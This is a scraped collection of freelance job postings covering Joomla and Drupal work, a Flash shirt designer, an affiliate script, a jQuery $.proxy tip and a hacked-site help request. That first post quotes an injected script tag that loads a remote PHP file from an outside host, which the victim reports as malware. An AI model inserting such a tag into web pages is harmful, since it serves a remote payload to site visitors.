Hacked Site – Need Help

Hacked Site – Need Help
Our sites have been getting hacked. If you look at www.webhostsupport.com it shows as malware in it. In the source code on the site they put this line of code in the site:

<script src=http://i.qrcllc.com/vicomp/button3.php ></script

This code is not in my original file and when I upload it to overwrite the file on the site, that code is still in the source. So how can this be happening?

I am hiring someone to help me fix my sites and get rid of the threats on my sites.

Flash Apps Mods

Flash Apps Mods
Description
I’m willing to pay $125-200 for this work. It must be done in 20 days or less. Basically have a flash application already made that allows you to put design on shirts. It will need to be modified to fit what the client needs. Message me and I’ll send you a link to it. NOte the applicatin is using shirt. They won’t be using shirts at all.

1. The customizer won’t save what the person has done for each side of the shirt. When they upload and image and say put in on the front of the shirt that image, when you click to add stuff to the left, right or back of the shirt that same image you uploaded is still there. Basically whatever they uploaded or did to one side of the shirt needs to save automatically the section of the shirt that the image it was uploaded too.

2. When they upload an image it needs to be automatically saved to the database so that the person who process the order can use that image again it’s it full version size. So the application will need to be connected to database obviously and you all will need to add a “next page” just like you see on this site http://www.broken(REMOVE_THIS)arrowwear.com/shirt/designer/shirt-builder.aspx take out (REMOVE_THIS) obviously in that link.

So that next page and how it will go to the next page and grab what was done in the flash application needs to be made. Also save needs to work. So that the user can save and come back to change their design.

3. Under select Product: Add “1.” to the purple box with “Select Product” in it.

Basically will be categories. We will combine the 4 poster page categories that we currently have available (event, holiday, celebration, sports). So Choose a product should read : Choose a category: event, holiday, celebration and sports.

4. Customers should have the ability to upload their own artwork as the base of the poster as well.

Since all of our products will be on paper, we won’t need the different views unless we are doing two sided products which we will do at some point. I don’t know if you should just include that feature and disable it for this particular product.

5. We have thumbnails for all of the above categories that you can pull from the product pages. They will need to be added with their respective categories to the list.

6. Under Add/Edit Text: Add “2.” to the purple box with the “Add/Edit Text” in it.

7. More fonts need to be added.

8. Only Bold and Italic are necessary for the font styles.

9. The color chart for the font needs to be bigger

10. A border option needs to be added. Where someone can choose a color for a border and the thickness. Same colors as you have available should be fine. Thickness can be measured in what ever units you feel will work.

10. Take out the text shaping feature.

11. Under Add/Edit Graphics: Add “3.” to the purple box with “Add/Edit Graphics” in it.

I will provide simple graphics for you to add to this category. Please let me know what the specs need to be. We can create both vector and raster files. I’m not sure what the preview will work with.

The company is using movia or mova or something. I think php can be used with it.

OutPut:

This will be sent to a a big printer. I thought that a hi resolution pdf might be the best output or this application. You will have to send the specifications for the text, font size, positioning, colors and so on to recreate the products and assemble them as print ready artwork. NOTE: I”m willing to discuss alternative ways of how this can be done. I’m not going to pay more money though. I just need the output to come out clear.

Project Sms Portal Drupal

Project Sms Portal Drupal
I’m willing to pay $175-250 for this work. it must be done in 18 days or less. You can use as many plugins as you want. It must be done in drupal. YOu dont’ have to do a design. Just use a standard drupal theme. This is all programming work and no design work.

My client needs a portal will be created for our clients to sign up and run campaigns or we will create accounts and run campaigns in our clients behalf:

Lets say I want to run a coupon campaign like this: Send COUPON to [obscured] or Sub-keyword Send COUPON STORE to [obscured] to get 15% off

Mobile device owner can now send a text to [obscured] with COUPON in the body

Mobile device owner will now get the 15% off coupon send via SMS to his device and can redeem it at the POS with a coupon code

THIS 3 OPTIONS NEED TO BE RUNNING AT THE SAME TIME! IT WILL BE A DIFFERENT SETTING DEPENDING ON OUR CLIENTS NEEDS AND BUDGET.
Send and receive messages throughout a SMS gateway like clickatell.com
and
Receive SMS on a GSM modem and send the keyword response message throughout a SMS gateway like clickatell.com
and
Receive SMS on a GSM modem and send response using same GSM modem

Create unlimited keywords and sub-keywords for campaigns

Export, import contacts (all or per keyword, sub-keyword)

Create reports

Use drupal it has some SMS modules you could build upon.

Installation design and all that will need to be done.

Attached is a mock up of the user front end

Affiliate Script/mlm

Affiliate Script/mlm
Programmers,

I need an affiliate script to integrate with my shopping cart.
I’m looking at one of two options to get a quality script on a budget.

Oprion#1
I like Omnistar Affiliate Software www.osiaffiliate.com It has everything I’m looking for in a script and more EXCEPT for a few items. With the first option I would purchase this program then I need a programmer to modify the script to include the following features.
• To pay affiliates, I would like export to excel all affiliate and commissions information. Similar to the PayPal mass pay download currently installed but with more info.
• I’ll be running a multi tier forced matrix program. So I need to be able to set the width on the matrix.
• I need the ability to suspend/delete affiliates who are not active (affiliates who have not made a sale in a given time period).

Option#2
If a programmer has a similar script the can be modified to meet my needs I’ll be interested.

Send me a PM detailing what option you would like to do and if you currently have a script you can make work and please include a link so I may check it out.

Thanks for your time.

Quick Tip: Learning jQuery 1.4’s $.proxy

Quick Tip: Learning jQuery 1.4’s $.proxy

One of my favorite new features in jQuery 1.4 is the new $.proxy method. It allows us force a particular context when calling a method. In JavaScript, there can be times when it’s difficult to hold on to the this keyword. For example, when it’s bound to some event handler, this now refers to the target of the handler, rather than your desired object.

If this sounds a bit confusing, don’t worry; today’s four-minute video quick tip should clear things up.


// Create an object.
var obj = {
        // this = obj
	somevar : 'some value',

	doSomething : function() {
		alert(this.somevar);
	}
};

// When bound to an event handler, this will
// refer to the target of the handler, or the div - not obj.
$('div').click(obj.doSomething); // undefined. 

// With $.proxy, we pass two parameters.
// 1. The method to call.
// 2. The context.
// In this case, we're forcing obj to once again be equal to this.
$('div').click( $.proxy(obj.doSomething, obj) ); // some value

Be sure to refer to the jQuery API for more information on $.proxy!



Writing Project

Writing Project
Hi,

I need a writer to write about a page of text (500 words max) about our new free email service. In addition I need about 10-20 different headlines written. This is not easy search engine writing work. This work will require a little research, a lot of thought and some creativity. In addition we will probably have to go back and forth with revisions several times. I will present you with a framework of ideas and then you will take it from there. Please give me one examples of your writing style. I’m looking for a fun and informative writing style to sell and describe our product. I need GREAT work from a GREAT writer. Please do not bid unless you are an actual writer that writes creative work. If you do great work, and we work well together, there will be much more work to follow.

Outsourcing companies please do not bid, as you will be ignored for this project. Sorry. I’m looking to establish a long term working relationship with an established hard working creative writer. I also prefer an American writer in this case as it works better for time zone differences and writing styles. Yet, this is not necessary, it will just make the work easier.

Regards,

Wyatt

Web Site File Search

Web Site File Search
I am looking for help with two things:

Each must have two parts
1) Example code, I don’t care about the language, just tell me what language you are using and how I can execute it.
2) Code must be well commented, and I would like a brief explanation of what is going on.

Project One: Web Site folder search

I want to be able to point a script at a certain site, have it com through the folders on that site, and then copy a specified type of file(s) to a destination I have chosen, ie my hard drive.
I do not want any illegal features built in such as password cracking. I want to be able to point it at a site, then run it.

Trumba Connect Calendar Clone

Trumba Connect Calendar Clone
We are a new start up company, and our website is about nightlife. So we need an event list, and a club directory application.

So we need a web-based event calendar solution clone of the Trumba connect application with some additional features.

Here is a link to their site:http://www.trumba.com, which lists all the features, and capabilities of the application.

We want our app to look like this calendar view with the regular events and featured events with images and additional styling.
http://university.trumba.com/online_calendars/admissions_table.aspx

In addition to the regular functions of the app, we need this application to

– work with joomla, and jomsocial.
– have the ability to allow event submission based on rights set in joomla.
– only allow certain account types to post featured events.
– have venue’s be searchable as a directory
– have widgets that show what events a jomsocial member has created
– have widgets that show what events a jomsocial member has registered for
– have a filter for ‘today’, ‘this week’, and ‘this month’

We are currently using RSevents, which has many functions, but not everything that we need. If it will curb the cost and time necessary, we can consider customizing RSevents instead of building the app from scratch.

Please send us a quote.
Thanks.

Multi League Site

Multi League Site
Hi all,

I’m looking for a team to do a website that can run any type of tournaments and leagues. From point leagues like soccer and NFL to xp gaming leagues.

MUST NOT HAVE ANY COPYRIGHT STUFF, MUST BE CUSTOM AS I WISH TO COPYRIGHT IT.

The website must have (its a lot)=

Site must have sections for different leagues like platforum eg 247leagues.com

General
Fast , server friendly Code with a single MySQL Database
Simple Installation with help files
Suitable For All Game and Platform Types (FPS, Sports, PS3, PC, etc)
Javascript Effects To Smooth Everything Out

Ladder and Tournament Features
Unlimited Ladder Capacity (Singles, Team)
Unlimited Tournament Capacity (Singles, Team)
Automated Team XP Ranking System
Challenge Based System on ladders
Report a WIN as well as a loss on ladder and tournament matches
Automatic randomized first round entrants on Tournaments
Strike / Warning System
Automatic Byes on odd tournament brackets
Play-by-dates for each round on Tournament brackets
Map Randomizer
Game Mode randomizer
Ladder Page Organized By Admin Defined Groups
Platforms or Game Genres as a top grouping level
Clan Manager With Profile Editor, and War Light
Members Can Join Current Teams, or Make Their Own.
Team Leaders can copy existing teams to new ladders
Clan Profile Page With Full Contact Details (MSN, Yahoo, AIM, Co-L AIM, ect.)
Ladder standings with Crown, Blasts, Stats, XP
King System (War for Crown)
Automatic Ticket creation on disputed results
Pay-To-Play Ladders and Tournaments
Comprehensive MatchFinder system

Social Networking Features
Each Members Gets Their Own Mailbox With Team Invites, And Friend Invites
Integration on registration and latest forum posts with PHPBB3.0 and Vbulletin
Member Profiles With Contact Information, About Me, Comments And More
Friends System / Ability To Become Private
Members Can Comment on News
Easily add cool blocks such as Live Chat, anything PHP based
Dynamic GamerCards integrated into site, showing stats with selectable graphics

Admin Control Panel
Admin Control Panel / Staff System
Easily add News, change the video and news ticker
Different specific Permissions For Each Staff Memberand role
Easily create and edit ladders and tournament
Ticket support system
Manage Pay 2 Play events
General script configuration settings

Other Special Features
Advertisement Areas
Drop-down menu system
Ability to change the Block positions
Full Featured Free Agent System With Commenting
Full Search System By ID or Name
Staff Applications

Features:
• Fully automated ladder ranking system allowing an unlimited number of ladders.
• Can be run as a stand-alone web site or integrated into a pre-existing site.
• Teams/Players ranked using complex ranking algorithm for more accurate ranking.
• Customizable ranking system to suit your needs.
• Installed easily in minutes.
• Fully customizable design.
• Ability to Edit Ladder and Tournament general settings from control panel.
• Suitable for all game types especially action games, sports, card&board games and strategy games.
• Built in theme system allowing you to switch between different layouts and designs in seconds.
• Users can select their own themes which activate when they login.
• Design your own themes easily, if desired.
• Alternatively, integrate the ladder code into your web site design. HTML knowledge required.
• Create unlimited ladders for team play or 1v1 play. Users need only sign up once.
• Advanced Admin system with separate admin accounts for each admin.
• Multiple admin access levels. Assign varying access rights to different admin accounts.
• Admins can report matches and edit challenges.
• Higher level admins can ban ips, edit/create ladders and edit/create admin accounts..
• Fully automated and highly advanced challenge feature.
• Each ladder can be set by you to be challenge-only, open-play only or both together.
• Rank, last rank, wins, losses, games played, streak, win percentage etc. recorded for each player account.
• Full contact info for each player and team account including email, website, MSN, AIM, Yahoo etc.
• Personal profile for each player and team including all their contact information, stats and logo.
• Country flag for each player and team which shows in profiles and on ladder.
• Fully automated sign-up and validation system.
• Completely automated ladder system, standings and statistics updated immediately after report.
• Player login to report matches, change account details and make challenges.
• Team leaders can login and invite/add new members to their team account.
• Match page listing all recent match results and details.
• Optional banner rotation.
• Lightning fast MySql database.
• Rules and staff page can be changed from admin control panel.
• Search page allowing users to search for individuals or teams.
• Newsletter function allowing admins to email all users on the ladder system.
• News shown on main page, either in headline format or in full story.
• Choose whether to have user or admin validation of accounts.
• Complete tournament system allowing multiple tournaments to be run at the same time.
• Run fully automated tournaments with anywhere from 4 to 512 players/teams per tournament.
• Players can sign up to tournaments using ladder team accounts.
• Support for numerous tournament types including double elimination.
• Admins can report tournament results to ladder system with click of a button.
• Tournaments can be run by admins via the ladder admin control panel.
• Admins can create,delete or edit tournaments with ease from the admin control panel.
• Admins can open/close signups, add/edit tournament rules and descriptions and much more.
• Fully automated visual brackets webpage showing latest results and progress to all.

4 types of leagues

1. Time trial software, people doing a qualifying sport e.g. motor racing. Can enter their time online and go up the leader board they have to arrange a time challenge (set by date and time) and then send in a ticket with their time on it (but can only be updated by staff once they see the ticket with their time and proof) Any Ladder can have any of the 4 leagues software?
2. Set points and fixture software like the soccer league and Indy car. Teams enter then after a cut off date set by staff the teams will be given matches to play at certain dates and times (set by staff) over a certain length of time (a season or 2months ect set by staff). If they win the match they get 3 points if they draw 1 and if they loose 0 staff can change the points.
3. Same as above for soccer but more than one team in one fixture like Indy car racing with points for 1st – 6th but can have up to 8 people in one race. For example if 8 people are racing who ever is first gets for example 10points 2nd 8points 3rd 6points 4th 4ponts 5th 2points 6th 1point and the rest none
Example Site for football=
http://www.footballmundial.com/teamtables.asp?area=1042&2=&tmID=41289
4. Invite Only Leagues done by staff for example over 18’s only which staff would need to verify their age before letting them in (Staff with 100 rated Permission Only can accept people into these leagues)

User groups category can be used for new leagues e.g. soccer and time trial (if can be done).

1. Player ID’s (e.g. Psn ect and I can change what is required to be filled in) on team pages
2. Player Id’s / players names on profile pages, PSN one needs Fixed and adding a new profile field doesn’t work so needs fixed as well.
3. Challenge Screen extended options e.g. 3 frags on/off part doesn’t work (then what to set it to on or off bit) so needs fixed as well
4. Members cap for teams e.g. doubles ladders ect
5. Pop up message saying when you have been challenged on a members profile page or the home page when they click into the site
6. Ref lights on staff page (for all staff) to say that they are available to ref (blue light to say available) Like war light, can be turned on for a certain period of time.
7. People can upload Live Stream to their profile pages and team page, just need a box so people can add the code into on edit pages and a box 200 X 200 on the page.
8. Add apply to join a team to team pages
9. Team names can be hidden or shown on match finder

Example sites are gamebattles.com eliteladders.com consolegaming.eu fleaflicker.com and 247leagues.com

Please send me a rough picture of the layout for the site and a pic of the admin layout that you have in mind.

Joomla Upgrade

Joomla Upgrade
We need to upgrade a complete Joomla 1.0.15 site to Joomla 1.5.15.

We have already done several other sites using the migrator plugin but this site must look 100% identical to the old one and is using a customized Rockettheme template (we have the original 1.5 version of this template in unmodified form).

Also all URLs (SEO friendly) must stay the same; there is a lot of wrappers with other websites in them and they must also keep the same URLs.

Old system uses Facile Forms for an inquiry form and that must be replicated with the same form using whatever component you like as long as it stays the same.

1.5.15 site must stay 100% CSS and W3C compliant and run on PhP5.3.

Joomla Site Fixes

Joomla Site Fixes
I have changes I need made to a joomla site. It’s located here www.rev(remove_this)eral.com I’m wiling to pay $100-150 for these changes.

These 1st 4 are somewhat fixed. I think 3 of them are done, but the mac issue may still be there. I’m not 100% that they are fixed though.

– Registration – Clicking Login or register on Mac (Firefox) brings up a blank box the first time. Sometimes the login will come up after a few tries. This also happens on the iPhone so it may be a MAC cross browser issue. This needs to be fixed. If you don’t have a Mac that is fine. We will work around it.

– Foot in the Door – A person who has received a FITD can forward it to another person, but the image and messages need to be sent as well.

– References – Upon approving a reference, it takes 12 minutes for that reference to be visible; the other processes of the reference are instant.

– 4 hr Job – Profile page defaults to YES upon re-logging in after someone has chosen NO. Search brings up everyone regardless of having chosen No.

Other issues that have not been dealt with at all and need fixing are:

(a) reference request issue Should be: (request, register, fill in, (user taken to profile pg), reference pending, approve, reference visible (via email) — as noted

(b) Search: some registered users do not come up… I went through JOOMLA Users — the register data for those who do not are no different than all the names that do come up. It’s 1 in 5 that’s not coming up.

(c) on Chrome — profile page, input info into “What do you do” , upon clicking Save.. people from the request email who can write on Profile are getting the error… this may not happen to you —

Cosmetic
(d) new button. Top nav. Right of Profile “Add References” .. Links to the contacter page.

(e) Please push down the image on the register page (from the email request).. its cutting into the heading.

Custom Joomla Development

Custom Joomla Development
We need some quotes from experienced Joomla developers who are actual “coders” , not just template specialists.

We need to incorporate the following functions:

* SEO/SEF
* A multilingual interface, front-end and back-end, that works fluently with all site functions
* A business directory
* An online community
* Integration of the directory and community, allowing members to keep track of their favorite directory listings
* A custom module that will allow community members to create projects and add directory listings to those projects as needed in the appropriate categories
* Video streaming/integration
* Ability to view use the site on mobile platforms as well.
* Integration of a ad server that allows for the targeting of ads to language specific content.

PHASE 1: Getting the multilingual site up and running with a functional directory module and video streaming cabability.

1. Integration of Joomla/JoomFish compatible directory module.

We have evaluated both SOBI2 and Mosets Tree options. Most agree that the Mosets code is more in sync with Joomla’s API and we are leaning in that direction. We welcome SOBI2 ideas if you have them but you will have to prove to us that SOBI2 is stable and able to do what we need. Then, and only then, will we consider using this module. The directory module also needs to be compatible with Yootheme templates and SEF functional.

2. Address format and other directory module tweaks to match the chosen interface language. Since our site will be targeting English and Japanese in the front-end and back-end, addresses in the directory need to be properly formatted.

Case in point:

English
123 Apple Street
Shibuya, Tokyo 123-4567
JAPAN

Japanese ( to be viewed in Japanese characters ):
JAPAN
123-4567 Tokyo Shibuya Apple Street 123

We can explain this in more detail later.

3. Additional directory module/plug-in development for specific features we are looking to implement.

4. Video streaming integration

PHASE 2 : Integrating the ad server, community and other small additions

1. AJAX Poll Module

Joomla has a poll module already but it is weak and unattractive. We’d like to enhance that module with AJAX features so that it functions on its own in the sidebar without disturbing the main page’s content. Again, needs to be JoomFish compatible.

2. Integration of a community module

As stated above, the community feature is one that aims to allow members to use the directory (from Phase 1 above) to the fullest. Conversely, we hope to limit community interaction at first, due to privacy reasons.

Members should be able to manage their own profiles and these profiles must also be connected to their business directory listings.

Members must be able to save certain directory listings into their favorites folder.

Members must also be able to create “projects” that they can add directory listings to.

3. Ad server integration

At this point in time, we like the iJoomla Ad Agency module and would like to integrate it into the site but will consider other modules if more appropriate. Key point here is the ability to serve ads to language specific content.

COMMENTS:

We are looking to develop a relationship with a developer. This is not a one-time contract and the site will need to be carefully updated in line with Joomla and related module updates.

We will need to see specific examples of your previous Joomla development history.

You must also be willing to sign an Non Disclosure Agreement.

Please submit your estimates on a Phase basis as described above. We are looking for round number estimates.

We look forward to getting to know you.

Format Joomla Page

Format Joomla Page
Hello
I need this page http://str8hiphop.com/index.php/music
formatted to look closer to this list of songs.
http://www.ihiphop.com/viewMusic.hhc

When a link is click I need the article/ audio player to open in a small popup the same way as on http://www.ihiphop.com/viewMusic.hhc (click the song title not the artist)

The page uses a great K2 content component that has all the fields we need. I just need them stylised and formatted.

So all the functionality is there and ready to go just need is it formatted.

We’re hoping to get this done today.

thanks!